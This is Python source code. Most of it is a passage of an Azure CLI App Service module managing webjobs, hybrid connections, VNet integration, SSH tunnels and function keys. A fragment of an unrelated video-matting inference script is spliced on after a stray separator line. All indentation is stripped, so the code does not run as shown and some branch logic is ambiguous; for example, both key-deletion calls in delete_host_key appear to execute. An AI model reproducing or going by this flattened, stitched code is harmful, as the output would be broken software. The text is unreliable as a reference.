return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
subnet_parameters=subnetObj)
id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
subnet_resource_id = id_subnet.id
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
swiftVnet, slot)
# reformats the vnet entry, removing unecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, dryrun=False, logs=False, # pylint: disable=too-many-statements,
launch_browser=False, html=False):
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = detect_os_form_src(src_dir, html)
lang_details = get_lang_from_content(src_dir, html)
language = lang_details.get('language')
# detect the version
data = get_runtime_version_details(lang_details.get('file_loc'), language)
version_used_create = data.get('to_create')
detected_version = data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(rg_name, plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. "
"Please create a new app to continue this operation.".format(name, current_os, src_dir, os))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_is_linux = os_name.lower() == 'linux'
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd=cmd,
user=user,
os_name=os_name,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if _is_linux else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.windows_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
# Remove the file after deployment, handling exception if user removed the file manually
try:
os.remove(zip_file_path)
except OSError:
pass
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.isAlive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.isAlive() and t.isAlive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
raise CLIError('webapp ssh is only supported on linux and mac')
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise CLIError('remote debugging is enabled, please disable')
create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and hostname_binding.host_name_type == 'Verified':
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name,
name1=key_name,
value=key_value)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
result = client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot, raw=True)
result = client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' of type '{}' from function app '{}'".format(key_name, key_type, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' of type '{}' does not exist in function app '{}'".format(key_name, key_type, name)
return result
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted function '{}' from app '{}'".format(function_name, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
name1=key_name,
value=key_value)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
result = client.web_apps.delete_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
raw=True)
result = client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' from function '{}'".format(key_name, function_name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' does not exist in function '{}'".format(key_name, function_name)
return result
|
inference_video.py | """
Inference video: Extract matting on video.
Example:
python inference_video.py \
--model-type mattingrefine \
--model-backbone resnet50 \
--model-backbone-scale 0.25 \
--model-refine-mode sampling \
--model-refine-sample-pixels 80000 \
--model-checkpoint "PATH_TO_CHECKPOINT" \
--video-src "PATH_TO_VIDEO_SRC" \
--video-bgr "PATH_TO_VIDEO_BGR" \
--video-resize 1920 1080 \
--output-dir "PATH_TO_OUTPUT_DIR" \
--output-type com fgr pha err ref \
--video-target-bgr "PATH_TO_VIDEO_TARGET_BGR"
"""
import argparse
import cv2
import torch
import os
import shutil
from torch import nn
from torch.nn import functional as F
from torch.utils.data import DataLoader
from torchvision import transforms as T
from torchvision.transforms.functional import to_pil_image
from threading import Thread
from tqdm import tqdm
from PIL import Image
from dataset import VideoDataset, ZipDataset
from dataset import augmentation as A
from model import MattingBase, MattingRefine
from inference_utils import HomographicAlignment
from read_write_utils import VideoReader, VideoWriter
# Reduced output to pha and fgr
REDUCED_OUTPUT = True
# Reduced output to pha only
PHA_ONLY = False
# --------------- Arguments ---------------
parser = argparse.ArgumentParser(description='Inference video')
parser.add_argument('--model-type', type=str, required=True, choices=['mattingbase', 'mattingrefine'])
parser.add_argument('--model-backbone', type=str, required=True, choices=['resnet101', 'resnet50', 'mobilenetv2'])
parser.add_argument('--model-backbone-scale', type=float, default=0.25)
parser.add_argument('--model-checkpoint', type=str, required=True)
parser.add_argument('--model-refine-mode', type=str, default='sampling', choices=['full', 'sampling', 'thresholding','fastfull'])
parser.add_argument('--model-refine-sample-pixels', type=int, default=80_000)
